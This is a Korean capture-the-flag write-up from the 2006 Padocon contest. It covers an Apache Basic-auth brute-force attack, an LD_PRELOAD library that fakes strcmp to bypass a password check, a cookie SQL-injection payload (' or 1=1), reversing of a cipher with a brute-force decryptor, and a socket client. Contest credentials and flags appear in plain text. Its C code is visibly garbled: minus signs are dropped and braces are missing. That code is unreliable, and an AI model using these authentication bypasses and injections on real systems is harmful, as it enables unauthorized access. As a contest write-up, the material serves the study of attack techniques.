Padocon Capture The Flag Hacking Contest Report team_name: ronny 구성원 - wooyaggo, hkpco 1. SectionA Level1 http://www.plus.or.kr/ctf/prob/c4724593d21aeccd08a4914b66ba278e SectionA Level1 : http://www.plus.or.kr/ctf/prob/c4724593d21aeccd08a4914b66ba278e /* */ http://168.188.130.240/mcthemecju/ hint1: id, password 모두 영어 소문자 네 개로 이루어져 있습니다. hint2: id는 body 입니다. SectionA의 level1은 아파치 인증을 통과하는 문제입니다. 우선 http://168.188.130.240/mcthemecju/ 주소로 접근을 하면 아파치 인증창이 나옵니다. `영역` 이라고 되어 있는 부분에는 Level7 Adult Club 이라고 되어 있습니다. 힌트는 아이디와 패스워드 모두 영어 소문자 네 개, 그리고 id는 body 라고 되어 있습니다. 약간의 센스를 이용하여 풀자면 성인 클럽에서 아이디는 body, 그리고 4글자로 시작하는 연관된 단어는 good, sexy 등이 있겠습니다. 추측되는 것들을 하나씩 대입시켜 보면 패스워드는 sexy 인 것을 알 수 있습니다. 다른 풀이는 아파치 인증을 Bruteforce 로 푸는 방법입니다.
아파치를인증할때사용하는 method는 Authorization 입니다. ( packet_capture 를하거나, rfc 를참고하면알수있습니다 ) 현재문제에서의아파치인증에서 Authorization method 의사용방법은아래와같습니다. ======================================================= Authorization: Basic ID:PASSWORD(base_64 encoding) ======================================================= C언어를이용하여 Bruteforce 를하도록코딩하였습니다. Base64 인코딩함수는인터넷에많이배포됩니다. BruteForce Program: http://hkpco.joinc.co.kr/apachebrute.c Base64_function Header: http://hkpco.joinc.co.kr/base64.h apachebrute.c 가하는일은문제서버의인증부분의패스워드를무차별대입을이용하여요청한뒤, 인증을통과하면그결과페이지를뿌려줍니다. 이제, apachebrute 를실행한뒤기다리면, 패스워드가일치했을때의결과페이지를뿌려줍니다. [hkpco@ns public_html]$ gcc o apachebrute apachebrute.c [hkpco@ns public_html]$./apachebrute Request Success! +++++++++++++++++++++++++++++ ID: body, Password: sexy +++++++++++++++++++++++++++++ HTTP/1.1 200 OK Date: Sun, 12 Feb 2006 21:14:20 GMT Server: Apache/2.2.0 (Unix) PHP/4.4.1 X Powered By: PHP/4.4.1 Content Length: 109 Content Type: text/html <HTML>
<BODY> <center> Congraturations!<br><br> Password is "YoSoSeXySeXy!" </center> </BODY> </HTML> 0//EN"> <html><head> <title>401 Authorization Required</title> </head><body> <h1>authorization Required</h1> <p>this server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p> </body></html>
2. SectionA level2 VafpdxhhwcctdpjneiqgjKtrrtwlhsipmqffmxxwiyjxvwxxvbtpBnpmjpwkqkdqnyqltnojvanujzglykhsdrxgxnpzm qpktxvwxsvedceujtggmftxzuxivanutscedubxklxqityxwhnqvafvbxybigedwljfytttscedubxqyhtruvhlttryanea nulzhynebjpmqaetpzfpwmclfqgjvhtpxhqkjuluqgigghabsceujtggmnybxjmtggoqryjbxvajrtxupttwnukzpgtyvy hztqwqwvpvhdqn 다음 사이트에서 CTF(복호화 key - YHV)를 복호화한 후, 문제에서 주어진 알파벳들과 함께 복호화하였습니다. http://math88.com.ne.kr/crypto/vigenere.html 복호화 결과 THANKSFORAJOBWELLDONEIAMPARJONGWHOMAKESUPTHEQUESTIONIINTENDFORYOUTOSOL VETHISQUESTIONBYSEEINGHOWFREQUENTLYALPHABETAREUSEDTHISANALYSISISSOPOWERF ULTHATISWIDELYUSEDFORANALYSISOFCRYPTOGRAMWHICHISSUFFICIENTLYLONGANDHASAO NETOONECORESSPONDENCYINALPHABETIWISHTOENJOYTHISTHEPASSWORDISRUNNOWCTFGO ODLUCKTOYOU 제일 마지막 문장 THEPASSWORDISRUNNOWCTFGOODLUCKTOYOU을 띄어쓰기로 나타내면 THE PASS WORD IS RUNNOWCTF GOOD LUCK TO YOU SectionA-level2의 패스워드는 runnowctf
3. SectionB level1 로그인 : flag flag@141.223.175.220 의비밀번호: flagthewind Last login: Mon Feb 6 01:09:37 2006 from 211.200.19.124 공지 : 기타작업은 /tmp밑에다가해주세요 [flag@rh73 flag]$ ls prob [flag@rh73 flag]$ cd prob/ [flag@rh73 prob]$ ls ctf_sf [flag@rh73 prob]$ ls l ctf_sf rwx x x 2 root root 13677 2월 4 10:16 ctf_sf LD_PRELOAD를이용해서 Read권한이없는실행파일의특정함수를 Hijack [flag@rh73.ronny]$ cat lib.c #include <dlfcn.h> int strcmp(const char *s1, const char *s2) { return 0; [flag@rh73.ronny]$ gcc fpic lib.c shared o lib.so [flag@rh73.ronny]$ ls a.out ctf_sf lib.c lib.so
Who is He???? [flag@rh73.ronny]$ cat test.c #include <stdio.h> int main() { int i; for ( i=0; i<9999;i++){ system("cp /home/flag/prob/.passwordfile."); return 0;
4. SectionB level2
r_num은항상 1234 로설정, r_nick 은 내가입력한별명 값 아무결과도안뜸 GET /madcow/list.php HTTP/1.1 Accept: image/gif, image/x xbitmap, image/jpeg, image/pjpeg, application/x shockwave flash, application/vnd.ms excel, application/vnd.ms powerpoint, application/msword, */* Referer: http://168.188.130.239/madcow/index.php Accept Language: ko Accept Encoding: gzip, deflate User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; (R1 1.5);.NET CLR 1.0.3705) Host: 168.188.130.239 Connection: Keep Alive Cookie: r_num=' or 1=1 ; r_nick=1;
*********************************************** your information : 이름 : levelpass 별명 : TooQooPoo0101 Secret Code : 1234 ***********************************************
5. SectionC level1 리버싱을통해암호화루틴과암호인증방식을분석하여암호화코드및인증스트링을분석했다. Enc.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include "dumpcode.h" int main (int argc, char *argv[]) { char *enc_passwd, *data=argv[1]; int len, cur, remainder; if(argc!=2){ printf("<usage> : %s string\n",argv[0]); return 1;
len=strlen(data); cur=len 1; enc_passwd = (char *)malloc(len+1); memset((void *)enc_passwd,0x00, len+1); for( ; cur>=0; cur ) { remainder = data[cur] % len; while(enc_passwd[remainder]!=0x00) { printf("%d\n",cur); remainder=(remainder+1) % len; enc_passwd[remainder] = data[cur] ^ remainder; dumpcode (enc_passwd,len+1); printf("%s",enc_passwd); free(enc_passwd); return 0; pyppw`c t`cg fn nh bdcp 6rca0 이런식으로 6 개의암호화된단어가붙어있다. 기존의암호화리버싱한것을통해서복호화프로그램제작만듬. Dec.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include "dumpcode.h"
char *encrypt(char *string) { // 암호화함수, return값 free 필요 char *enc_passwd, *data=string; int len, cur, remainder; len=strlen(data); enc_passwd = (char *)malloc(len+1); memset((void *)enc_passwd,0x00, len+1); for(cur=len1;cur>=0;cur ){ remainder = data[cur] % len; while(enc_passwd[remainder]!=0x00) { remainder=(remainder+1) % len; enc_passwd[remainder] = data[cur] ^ remainder; return enc_passwd; int main(int argc, char *argv[]) { char *enc_string=argv[1]; char *dec_string; int cur, nst; // nst = n번째문자비교중 char ch, *enc_data; // enc_data = dec_string 암호화한문자열 if(argc!=2) { printf("<usage> : %s <encrypt password> n",argv[0]); return 1; dec_string=malloc(strlen(argv[1]));
memset(dec_string, 0x20, strlen(argv[1])); dec_string[ strlen(argv[1]) 1 ] = 0x00; printf("enc_string length is %d n", strlen(enc_string)); for(cur=strlen(enc_string) 1;cur>=0;cur ) { nst=strlen(enc_string) cur; for(ch=0x20;ch<=0x7e;ch++) { dec_string[cur]=ch; enc_data=encrypt(dec_string); #ifdef DEBUG printf(" npassword is [%s] n",enc_data); printf("data is [%s] n",dec_string); printf("nstis%d n",nst); #endif if(strncmp(enc_data,enc_string,nst)==0) { printf("%dst character is '%c' n", nst, ch); free(enc_data); break; free(enc_data); printf("encrypt string is [%s] n", dec_string); return 0;
6. SectionC level3 패킷캡쳐를통해서어떻게패킷이나가는지확인하고파일명만수정해서 Cli.c #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> /* close */ #include <string.h> #define SERVER_PORT 7979 int sockfd; void error(char *string) { fprintf(stderr,"%s error \n",string); close(sockfd); exit(1);
int main(int argc, char *argv[]) { int cc; // connect checker struct sockaddr_in con_sock; char str[256]; char segment[100]; sockfd=socket(af_inet, SOCK_STREAM, IPPROTO_TCP); if(sockfd<0) { fprintf(stderr,"socket() error \n"); exit(1); con_sock.sin_addr.s_addr = inet_addr("168.188.130.240"); con_sock.sin_family = AF_INET; con_sock.sin_port = htons(server_port); cc=connect(sockfd,(struct sockaddr *)&con_sock, sizeof(con_sock)); if(cc < 0) error("socket()"); cc=send(sockfd, "ARE YOU LIVING IN THE REAL WORLD?", strlen("are YOU LIVING IN THE REAL WORLD?"), 0); if(cc<0) error("send()"); cc=send(sockfd, argv[1], strlen(argv[1]), 0);
cc=recv(sockfd,str,255,0); printf("%s",str); return 0;./cli./real_data.txt ================================================= You've got a real word. Congraturations!!! The P4ssw0rd is "Unlimited Ru1es!" =================================================
2. SectionC level3 시리얼 생성 문제입니다. 풀다가 남겨둔 자료가 없어서;; 적당히 암호 비교 루틴 부분에 break를 걸고 레지스터에 있는 16진수 값을 10진수로 해석하니 시리얼을 구할 수 있었습니다. Port 우회 루틴은 구현하지 않았습니다; 바로 웹페이지 인증에서 암호를 넣으니 통과되더라구요^^